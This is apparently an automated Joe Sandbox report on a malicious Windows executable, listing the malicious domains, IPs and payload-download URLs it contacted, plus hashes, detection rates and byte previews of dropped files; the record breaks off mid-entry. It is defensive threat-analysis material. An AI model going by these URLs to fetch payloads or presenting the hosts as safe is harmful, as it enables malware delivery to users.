        ddos.dnsnb8.net | 12% | Virustotal | | Browse
        ampyazilim.com.tr | 0% | Virustotal | | Browse
        apple-pie.in | 14% | Virustotal | | Browse
        arthur.niria.biz | 11% | Virustotal | | Browse
        ahmediye.net | 9% | Virustotal | | Browse
        althawry.org | 12% | Virustotal | | Browse
        windowsupdatebg.s.llnwi.net | 0% | Virustotal | | Browse
        amsamex.com | 8% | Virustotal | | Browse
        g2.arrowhitech.com | 3% | Virustotal | | Browse

        Name | IP | Active | Malicious | Antivirus Detection | Reputation
        www.careerdesk.org | 54.244.188.177 | true | true | | unknown
        ddos.dnsnb8.net | 44.221.84.105 | true | true | | unknown
        ampyazilim.com.tr | 37.230.104.89 | true | true | | unknown
        apple-pie.in | 44.221.84.105 | true | true | | unknown
        arthur.niria.biz | 44.221.84.105 | true | true | | unknown
        ahmediye.net | 78.46.2.155 | true | true | | unknown
        windowsupdatebg.s.llnwi.net | 46.228.146.128 | true | false | | unknown
        amsamex.com | unknown | unknown | true | | unknown
        althawry.org | unknown | unknown | true | | unknown
        g2.arrowhitech.com | unknown | unknown | true | | unknown
        • Avira URL Cloud: malware
        unknown
        http://ampyazilim.com.tr/images/xs2.jpg?a8241ece=-18553763721#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://kukutrustnet777888.info/DisableTaskMgrSoftware#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3795163173.00000000024A0000.00000040.00001000.00020000.00000000.sdmpfalse
        • Avira URL Cloud: phishing
        unknown
        https://www.msn.com/sports?OCID=WSB_TL_EL&PC=wsbmsnqsSearchApp.exe, 0000001F.00000000.1608113405.000001D62E2D1000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000001F.00000000.1592907269.000001D62DC47000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000001F.00000000.1616012570.000001D6305B0000.00000004.00000001.00040000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://althawry.org/images/xs.jpg#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3842902328.00000000046D3000.00000004.10000000.00040000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3790167124.0000000002408000.00000004.00000010.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3812391802.00000000039CC000.00000004.00000010.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000003.1281486806.0000000000870000.00000004.00000020.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3790167124.000000000240E000.00000004.00000010.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3795163173.0000000002495000.00000040.00001000.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000003.1281602249.00000000008C7000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000027.00000002.3814434317.0000000004A33000.00000004.10000000.00040000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        unknown
        http://althawry.org/images/xs.jpg?17915f51=790806178#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        IP | Domain | Country | ASN | ASN Name | Malicious
        44.221.84.105 | ddos.dnsnb8.net | United States | 14618 | AMAZON-AESUS | true
        78.46.2.155 | ahmediye.net | Germany | 24940 | HETZNER-ASDE | true
        54.244.188.177 | www.careerdesk.org | United States | 16509 | AMAZON-02US | true
        37.230.104.89 | ampyazilim.com.tr | Turkey | 42807 | AEROTEK-ASTR | true
        85.17.167.196 | unknown | Netherlands | 60781 | LEASEWEB-NL-AMS-01NetherlandsNL | false
        Joe Sandbox version:40.0.0 Tourmaline
        Analysis ID:1467984
        Start date and time:2024-07-05 08:00:08 +02:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 13m 33s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
        Number of analysed new started processes analysed:20
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:22
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Sample name:#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
        renamed because original name is a hash value
        Original Sample Name:.exe
        Detection:MAL
        Classification:mal100.spre.troj.evad.winEXE@8/133@107/5
        EGA Information:
        • Successful, ratio: 66.7%
        HCA Information:
        • Successful, ratio: 89%
        • Number of executed functions: 86
        • Number of non-executed functions: 211
        Cookbook Comments:
        • Found application associated with file extension: .exe
        • Override analysis time to 240s for sample files taking high CPU consumption
        • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
        • Exclude process from analysis (whitelisted): dllhost.exe, audiodg.exe, WerFault.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, svchost.exe
        • Excluded IPs from analysis (whitelisted): 20.42.65.84
        • Excluded domains from analysis (whitelisted): self-events-data.trafficmanager.net, fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, self.events.data.microsoft.com, onedscolprdeus02.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
        • Execution Graph export aborted for target cscript.exe, PID 5220 because it is empty
        • HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
        • Not all processes where analyzed, report is missing behavior information
        • Report size exceeded maximum capacity and may have missing behavior information.
        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
        • Report size getting too big, too many NtDeviceIoControlFile calls found.
        • Report size getting too big, too many NtEnumerateKey calls found.
        • Report size getting too big, too many NtOpenFile calls found.
        • Report size getting too big, too many NtOpenKeyEx calls found.
        • Report size getting too big, too many NtQueryValueKey calls found.
        • Report size getting too big, too many NtSetValueKey calls found.
        • Report size getting too big, too many NtWriteVirtualMemory calls found.
        Time | Type | Description
        02:00:53 | API Interceptor | 3836657x Sleep call for process: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe modified
        02:00:54 | API Interceptor | 1x Sleep call for process: dllhost.exe modified
        02:01:35 | API Interceptor | 515132x Sleep call for process: cscript.exe modified
        02:02:00 | API Interceptor | 1492x Sleep call for process: explorer.exe modified
                                  Process:C:\Users\user\AppData\Local\Temp\YMZwp.exe
                                  File Type:MS-DOS executable PE32 executable (GUI) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):19456
                                  Entropy (8bit):6.591070226190889
                                  Encrypted:false
                                  SSDEEP:384:1FzSrXZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:WlQGPL4vzZq2o9W7GsxBbPr
                                  MD5:DB3CF007FDE989AA8497D84C84A64C54
                                  SHA1:66708BF9AB6B71C2817351C1807ECBE2E18EC679
                                  SHA-256:6F0DD666EB89CF2D62DC4A98440A178B7EF38A095F5231062CAD4CEAC0E3C690
                                  SHA-512:E489BE5581B56FF4857A8DDDEEFFB95FF0F23CD87C28DBEA94979AFBFFC1B93690D7EF304F76B3C47B49B285B599582876DBF48C607C1C888C85C9AEC1596A4C
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Avira, Detection: 100%
                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                  Process:C:\Users\user\AppData\Local\Temp\YMZwp.exe
                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                  Category:modified
                                  Size (bytes):2389504
                                  Entropy (8bit):6.731346177851746
                                  Encrypted:false
                                  SSDEEP:49152:BGSXoV72tpV9XE8Wwi1aCvYMdRluS/fYw44RxL:V4OEtwiICvYMpf
                                  MD5:B45FB91E1DE9F85CEB24ED0BE3351E30
                                  SHA1:397178D2FBBA12C606B0AE31B8861F82347671F5
                                  SHA-256:1E0166727729FCC5411245DEA917360D6252B4AE5871378B539D811B1A27CEBB
                                  SHA-512:D371DC73B18448F1CFA7A8A6513973416C9690DDAE59F6E6146D629155025469C6625A8E39A3C0F6471F460A59DD3A5F690C39490378037E704E508CCA48092D
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Avira, Detection: 100%
                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                  Process:C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                  Category:dropped
                                  Size (bytes):4210216
                                  Entropy (8bit):6.5030627280414235
                                  Encrypted:false
                                  SSDEEP:49152:4pawZh+vD5oLv9eqJ/iUPnspBu/MLPgyLMLQB4gQDyJ0ryMOAqk9l/hO2y/BA:xehFLvTQDpB5oSOmlBm
                                  MD5:69222B8101B0601CC6663F8381E7E00F
                                  SHA1:DC1F4774F3104DEA6A50646D6C11EFEFD2A29169
                                  SHA-256:F2DE2A37E6DFC90FFD0162EF11A7C9792850E37767B1E2C5AD28C751D18D750F
                                  SHA-512:03493D5105A3A0E8C95E6E0AC8D7F814FF075FE9D36C389067E021D55B4D75CA3BDD4D688EFA9B00D8A5E84513FF99774C2A4C9B30CC89FB8FF94154BFEB32A9
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Joe Sandbox View:
                                  • Filename: a4#Uff09.exe, Detection: malicious, Browse
                                  • Filename: aspweb.exe, Detection: malicious, Browse
                                  • Filename: aspweb88.exe, Detection: malicious, Browse
                                  Process:C:\Users\user\AppData\Local\Temp\YMZwp.exe
                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):31744
                                  Entropy (8bit):6.366522990138874
                                  Encrypted:false
                                  SSDEEP:768:uWQ3655Kv1X/qY1MSdIxQGPL4vzZq2o9W7GsxBbPr:uHqaNrFdI2GCq2iW7z
                                  MD5:6FE5222A003F3E4177F7C5BD7E8B0736
                                  SHA1:7BB801FB9D05DE3CA10DF14062939C33D68E62ED
                                  SHA-256:1C7125A25D7752101BC5092697E9AFFC24C49D7C9A6A6F5345EC573E3C8388D9
                                  SHA-512:6790CC7BF588ED4F7513646C233F5A81F0C4F30E83C7E09D9A5953DB38BD381EC5A5BD906325D42360F6C733FE7FA0D27AEE79FF1E59D94AD4D5C50FFD3BDFBD
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Avira, Detection: 100%
                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                  Process:C:\Users\user\AppData\Local\Temp\YMZwp.exe
                                  File Type:ASCII text
                                  Category:dropped
                                  Size (bytes):4
                                  Entropy (8bit):1.5
                                  Encrypted:false
                                  SSDEEP:3:Nv:9
                                  MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                  SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                  SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                  SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                  Malicious:false
                                  Preview:foo.
                                  Process:C:\Windows\System32\dllhost.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):8192
                                  Entropy (8bit):0.6483774055598415
                                  Encrypted:false
                                  SSDEEP:48:VDiwZD9iwZDaCk2L4izDiwZD9iwZDaCk2L4i:1iY9iY1kMNiY9iY1kM
                                  MD5:6240E4A55CE1298152DDA378F9B0DBA2
                                  SHA1:8F43CDAFF641670E5E8C9B9B942B49C4AC03BD6A
                                  SHA-256:8A9CD303B64A10935F49D4DD7930CCA6181C323A585822266D5DCF7E844ECF36
                                  SHA-512:315AEB8B9693534A103BC20FE610D02EAE6FBE3CAD6726E47823DE2E1302AC88545F58DA44BD9EA58A255FC4CF151B25C84007C3E7667E6BE9B1D8E23D5E8F92
                                  Malicious:false
                                  Preview:..?e...................';...{-.................C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\..............................................................................................................................................................................................................C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\...............................................................................................................................................................................................................0u........................................................................................................... ..t.......S.......h.m.......k......X.2';...{k.................C.:.\.U.s.e.r.s.\.t.i.n.a.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.W.e.b.C.a.c.h.e.\.W.e.b.C.a.c.h.e.V.0.1...d.a.t......................................................................................................................
                                  Process:C:\Windows\System32\dllhost.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):524288
                                  Entropy (8bit):0.525971698026289
                                  Encrypted:false
                                  SSDEEP:768:pX0CgFkARixmBG/mjv5I83KVFInQCWldALnbaaPyqv1RpnF7MmbR2:pXhOvjvPZ5PJX
                                  MD5:10B55D67F9EEAF1D5096246541E8B310
                                  SHA1:026D9DC530586E487A03B882C03FA739F494D723
                                  SHA-256:0D46C804C4B5A3EF28EC967E8181E03563C14177216782CAAF5CB61ADB9F4443
                                  SHA-512:6727CD4C9561E43F1158B31681C745CAA7F011E372843828AD09FA203645DF8982A73162FF662D3EEE15639DE1A3BC85C681AD9E284F659E975221788DF64717
                                  Malicious:false
                                  Preview:);#..................|}......{E.........<......';...{-.................C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\..............................................................................................................................................................................................................C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\...............................................................................................................................................................................................................0u.............................................l...........U.$.!.!.#......... ..........S.......h.m.......k......X.2';...{k.................C.:.\.U.s.e.r.s.\.t.i.n.a.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.W.e.b.C.a.c.h.e.\.W.e.b.C.a.c.h.e.V.0.1...d.a.t..............................................................................................................................
                                  Process:C:\Windows\System32\dllhost.exe
                                  File Type:OpenPGP Secret Key
                                  Category:dropped
                                  Size (bytes):524288
                                  Entropy (8bit):5.854861002272465
                                  Encrypted:false
                                  SSDEEP:6144:L5lFsSImQNIi46kVE7x6mEgIxuqSWWBDWpCHr:g4mp+sR
                                  MD5:68E1F7CFF577FCAB452478E81DBAF85B
                                  SHA1:1BD0552F28B74EDADA3970C29830B64F87CED749
                                  SHA-256:7C3163EF2DA61FF23F1DB54411EDD87C9EEFBD9DE0431BE2AE8375FEBA636173
                                  SHA-512:384B2404521A4AD8E3BE11535887DE5C873F06B57077A520FB3D95A9926ADEADEF143575BCB809CCED0EE54BDFC66E7B08165BB3BD9E4DAE35A22BCE19CE046D
                                  Malicious:false
                                  Preview:.....................{E......{..........<......';...{-.................C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\..............................................................................................................................................................................................................C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\...............................................................................................................................................................................................................0u........................................................M6....[i.#......... ..(.......S.......h.......6........X.2';...{k.................C.:.\.U.s.e.r.s.\.t.i.n.a.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.W.e.b.C.a.c.h.e.\.W.e.b.C.a.c.h.e.V.0.1...d.a.t..............................................................................................................................
                                  Process:C:\Windows\System32\dllhost.exe
                                  File Type:Extensible storage engine DataBase, version 0x620, checksum 0xed5f7e20, page size 32768, DirtyShutdown, Windows version 10.0
                                  Category:dropped
                                  Size (bytes):16252928
                                  Entropy (8bit):0.9724942679462584
                                  Encrypted:false
                                  SSDEEP:6144:woTl5eo1CKGP5q/XiE4L5E8NP//Xsx0BnNP//Xsx0Bn695nu8eX8e58ekpjX8evO:ahngFrVo90FdLhVKsKQn19
                                  MD5:5B1F5C560CEA058B0FAE9559C06071B9
                                  SHA1:A38FA6A7F75DFDD91962C97320869B908105BBD5
                                  SHA-256:B08B22C6E41DB8C0D2DD634C4C399B6F6A1A87A0DB07E1D08FE833B21C028F4A
                                  SHA-512:E972DE792A33E2D6FCF64B371D83B6D9A5D5CF9AE6964DF989D1C9E2291562175B6471653821DDDBD9376B33CC9ABD015E6D1F302CAE0F4DE3D6B97237D66CAF
                                  Malicious:false
                                  Process:C:\Windows\System32\dllhost.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):16384
                                  Entropy (8bit):0.12994162714006957
                                  Encrypted:false
                                  SSDEEP:6:S8Yffi3lL0UMJl4aeB2oMOSlbQqO+0CqAvQ/:0K3l4UMJBiMRlbn+YvQ/
                                  MD5:16A2F2CC9DD86BFEFFDED8AC748F07FB
                                  SHA1:8E3E40925074143EB617FE6E7EC12604E2AFFD61
                                  SHA-256:AD24719214A7FED21DF65CD2B0E9DFA9616CC3FE13BC77A2DFB97420D24E6AB2
                                  SHA-512:AE5D1527414F46C5CA9509C407994BEFEA565D1267C2781089DF01E2DFE4FE92E99E914870EC7CF15BD97809C6232CA2E8F8E54943368A0FD67A3082518E6DFE
                                  Malicious:false
                                  Process:C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
                                  File Type:MS Windows registry file, NT/2000 or above
                                  Category:dropped
                                  Size (bytes):16384
                                  Entropy (8bit):1.8841901816926478
                                  Encrypted:false
                                  SSDEEP:96:wJB3l4uvE6OtBqxYrHYM0vxZ244SSP2KxkxT:kBVJvE6OtISCjOHC
                                  MD5:6259EEB6231167CEA1302C7533D6E912
                                  SHA1:B357438E20E4C707809E534C1733F9701D014CF6
                                  SHA-256:951CE40E89E3C7198386B5B274FDA1CEF871077AFDF6A06BABD863FA3788CB22
                                  SHA-512:2EC59371CE39C7B51198EE5A15192F3466259181143B62EC84D3CD1BC7D6C1671C0A1806E176339056A0B0774CEDE0FDB6712C8AEE5DD0B53FDE63A074EF098F
                                  Malicious:false
                                  Preview:regf........b.Q.7.................. ....0......1.h.2.t.x.y.e.w.y.\.S.e.t.t.i.n.g.s.\.s.e.t.t.i.n.g.s...d.a.t...y..j.....J.....y..j.....J.........z..j.....J.....rmtm".................................................................................................................................................................................................................................................................................................................................................;.h"........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                  Process:C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
                                  File Type:MS Windows registry file, NT/2000 or above
                                  Category:dropped
                                  Size (bytes):8192
                                  Entropy (8bit):1.9894255761207573
                                  Encrypted:false
                                  SSDEEP:48:LJCNjE876IhF74c5v6gJkAEm/mtAYsNFUr+dSaYefl6tcHktnVAnfFpN+:LJCNd3l4uvE6OtBqxYrHYM
                                  MD5:5C079C84A186E8B1961032E64C3DC354
                                  SHA1:21EB01E3B82B6F488001E762B7A8BAFE593C269C
                                  SHA-256:3A4A608653ED59005D4086D03C3AEC1709F7FE2081092952BBCE28BCE0F752EF
                                  SHA-512:677614960C32A6B2C05EEFCCC07FC5749AE229F593D1557A5FD9E5E2E7CAEF9877E045869712F4015D50452A1C9E5F647AB5DE7B9D79FBE3652F187C6A9AC09F
                                  Malicious:false
                                  Preview:regf........b.Q.7.................. ....0......1.h.2.t.x.y.e.w.y.\.S.e.t.t.i.n.g.s.\.s.e.t.t.i.n.g.s...d.a.t...y..j.....J.....y..j.....J.........z..j.....J.....rmtm".................................................................................................................................................................................................................................................................................................................................................<.h"HvLE.............0.......wb.c.z..s...........hbin................b.Q.7..........nk,.T...7..................................x...............................Test....p...sk..h...h.......t.......H...X.............4.........?.......................?....................... ... ...............YQ..fr]%dc;.............vk......0...........PeekBadges..........[.]....|.........................JJG.k...ey ........p...sk..x...x.......t.......H...X.............4.........?.......................
                                  Process:C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):15872
                                  Entropy (8bit):7.031113762428177
                                  Encrypted:false
                                  SSDEEP:384:7XZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:1QGPL4vzZq2o9W7GsxBbPr
                                  MD5:56B2C3810DBA2E939A8BB9FA36D3CF96
                                  SHA1:99EE31CD4B0D6A4B62779DA36E0EEECDD80589FC
                                  SHA-256:4354970CCC7CD6BB16318F132C34F6A1B3D5C2EA7FF53E1C9271905527F2DB07
                                  SHA-512:27812A9A034D7BD2CA73B337AE9E0B6DC79C38CFD1A2C6AC9D125D3CC8FA563C401A40D22155811D5054E5BAA8CF8C8E7E03925F25FA856A9BA9DEA708D15B4E
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Avira, Detection: 100%
                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                  • Antivirus: ReversingLabs, Detection: 100%
                                  Joe Sandbox View:
                                  • Filename: a4#Uff09.exe, Detection: malicious, Browse
                                  • Filename: 1.0.0.2.exe, Detection: malicious, Browse
                                  • Filename: log1.exe, Detection: malicious, Browse
                                  • Filename: log2.exe, Detection: malicious, Browse
                                  • Filename: 2.exe, Detection: malicious, Browse
                                  • Filename: gracNYJFpD.exe, Detection: malicious, Browse
                                  • Filename: xpKZwKFN9W.exe, Detection: malicious, Browse
                                  • Filename: LVF7FM9Z4I.exe, Detection: malicious, Browse
                                  • Filename: hJSrJRHret.exe, Detection: malicious, Browse
                                  • Filename: KFt0cactum.exe, Detection: malicious, Browse
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......z.I.>.'.>.'.>.'..7\.2.'...(.?.'.>.&.y.'.Q.#.=.'..).?.'.7...6.'.7...?.'.Rich>.'.................PE..L...JG.R.............................`.......0....@.......................................@..................................p...............................o.......................................................................................text.... ..........................`....rdata.......0......................@....data........@......................@....reloc.......P.......(..............@....aspack.. ...`.......,..............`....adata...............>..............@...................................................................................................................................................................................................................................................................................................
                                  Process:C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):258
                                  Entropy (8bit):7.284780829056715
                                  Encrypted:false
                                  SSDEEP:6:EGGrshSV4EmRJBY9aqgbSKoD9ih7lZDlezcHZ47l7q2w32:EGGAhSuC9albSKa9illezcW7L
                                  MD5:88D20B23F81FA97A852263FC732277F8
                                  SHA1:9F739F07E8827D6850593B4358FE4AB0D9A5FF79
                                  SHA-256:B2C202F638284DCA99822379F447FC45100F0EA2AA3E19DBAD8DD47F55ADF033
                                  SHA-512:458B5103762FAAE5FD47BBEBBA479551DB8D9C3C3E5F9D77671E1D05AF1FE00750D3FA6DFB34C4799245A0402F8446C82B1FFC4890FAA294AA0C6E9976EBF2E6
                                  Malicious:false
                                  Process:C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):340
                                  Entropy (8bit):7.428989227311812
                                  Encrypted:false
                                  SSDEEP:6:gZJO5bFL66/NU/K/8co34DbynLoaqRQs/Cb9rbJVoHwsrgbFRFhNMod7:gbQFWtG8cxbyLFjb9rbJihrcRFhNMM
                                  MD5:2516CA1835F985ADEAB21CFBC34FF724
                                  SHA1:84D5608CFC6ADDA355587C0EC9824879404316EF
                                  SHA-256:85E67D6B1FD7741E4AF758EE5E108DDE1432D414CBF34B18BAA417044EB8EAC1
                                  SHA-512:B0D3CF50931C5794A0584895911F15F6F2B44244C55AD0FF75C020C18BC3599D2C736D7608A11AE54F9D369B4718769C726FEBEF37EDDAA76F632E5AB487ADE6
                                  Malicious:false
                                  Process:C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):340
                                  Entropy (8bit):7.428989227311812
                                  Encrypted:false
                                  SSDEEP:6:gZJO5bFL66/NU/K/8co34DbynLoaqRQs/Cb9rbJVoHwsrgbFRFhNMod7:gbQFWtG8cxbyLFjb9rbJihrcRFhNMM
                                  MD5:2516CA1835F985ADEAB21CFBC34FF724
                                  SHA1:84D5608CFC6ADDA355587C0EC9824879404316EF
                                  SHA-256:85E67D6B1FD7741E4AF758EE5E108DDE1432D414CBF34B18BAA417044EB8EAC1
                                  SHA-512:B0D3CF50931C5794A0584895911F15F6F2B44244C55AD0FF75C020C18BC3599D2C736D7608A11AE54F9D369B4718769C726FEBEF37EDDAA76F632E5AB487ADE6
                                  Malicious:false
                                  Preview:9.?...h.q.I......;4.\...*CJ.. ..C.gN."..v.v.^].!.Qr...U..RM.......g..T$8..,....Y[f].....'..S..%..8._..n.Dx...&.....a....0=..........2.[.qki.1...0...-wW_.8.:sP.O.&..........8V....^E..?N.H.!Mk<wo.......0v..N.y....z..z...q....I.R8`........S........o.P57..,.n.".c...8....MjD.q-`..m.Xg......u.~..9.p.AQ%cE..z........F..rt...A.-....
                                  Process:C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):258
                                  Entropy (8bit):7.284780829056715
                                  Encrypted:false
                                  SSDEEP:6:EGGrshSV4EmRJBY9aqgbSKoD9ih7lZDlezcHZ47l7q2w32:EGGAhSuC9albSKa9illezcW7L
                                  MD5:88D20B23F81FA97A852263FC732277F8
                                  SHA1:9F739F07E8827D6850593B4358FE4AB0D9A5FF79
                                  SHA-256:B2C202F638284DCA99822379F447FC45100F0EA2AA3E19DBAD8DD47F55ADF033
                                  SHA-512:458B5103762FAAE5FD47BBEBBA479551DB8D9C3C3E5F9D77671E1D05AF1FE00750D3FA6DFB34C4799245A0402F8446C82B1FFC4890FAA294AA0C6E9976EBF2E6
                                  Malicious:false
                                  Preview:.M.4..{.}...Y......r..~.3.d..A......$..a76W.W;.....I:....JFc...,.R_L00r.R+%./....r..K.%.M....w.iKn;.. ...{.H{..];.._..`<..<...M.].....{..F...t5m...b....e....^.D.3.n.C.j.........?..%?!e.Z=.v.Q,.S......DVji#........{.&.f.S..).(..J.<......|*...|..b.
                                  Process:C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):258
                                  Entropy (8bit):7.284780829056715
                                  Encrypted:false
                                  SSDEEP:6:EGGrshSV4EmRJBY9aqgbSKoD9ih7lZDlezcHZ47l7q2w32:EGGAhSuC9albSKa9illezcW7L
                                  MD5:88D20B23F81FA97A852263FC732277F8
                                  SHA1:9F739F07E8827D6850593B4358FE4AB0D9A5FF79
                                  SHA-256:B2C202F638284DCA99822379F447FC45100F0EA2AA3E19DBAD8DD47F55ADF033
                                  SHA-512:458B5103762FAAE5FD47BBEBBA479551DB8D9C3C3E5F9D77671E1D05AF1FE00750D3FA6DFB34C4799245A0402F8446C82B1FFC4890FAA294AA0C6E9976EBF2E6
                                  Malicious:false
                                  Preview:.M.4..{.}...Y......r..~.3.d..A......$..a76W.W;.....I:....JFc...,.R_L00r.R+%./....r..K.%.M....w.iKn;.. ...{.H{..];.._..`<..<...M.].....{..F...t5m...b....e....^.D.3.n.C.j.........?..%?!e.Z=.v.Q,.S......DVji#........{.&.f.S..).(..J.<......|*...|..b.
                                  Process:C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):258
                                  Entropy (8bit):7.284780829056715
                                  Encrypted:false
                                  SSDEEP:6:EGGrshSV4EmRJBY9aqgbSKoD9ih7lZDlezcHZ47l7q2w32:EGGAhSuC9albSKa9illezcW7L
                                  MD5:88D20B23F81FA97A852263FC732277F8
                                  SHA1:9F739F07E8827D6850593B4358FE4AB0D9A5FF79
                                  SHA-256:B2C202F638284DCA99822379F447FC45100F0EA2AA3E19DBAD8DD47F55ADF033
                                  SHA-512:458B5103762FAAE5FD47BBEBBA479551DB8D9C3C3E5F9D77671E1D05AF1FE00750D3FA6DFB34C4799245A0402F8446C82B1FFC4890FAA294AA0C6E9976EBF2E6
                                  Malicious:false
                                  Preview:.M.4..{.}...Y......r..~.3.d..A......$..a76W.W;.....I:....JFc...,.R_L00r.R+%./....r..K.%.M....w.iKn;.. ...{.H{..];.._..`<..<...M.].....{..F...t5m...b....e....^.D.3.n.C.j.........?..%?!e.Z=.v.Q,.S......DVji#........{.&.f.S..).(..J.<......|*...|..b.
                                  Process:C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  File Type:data
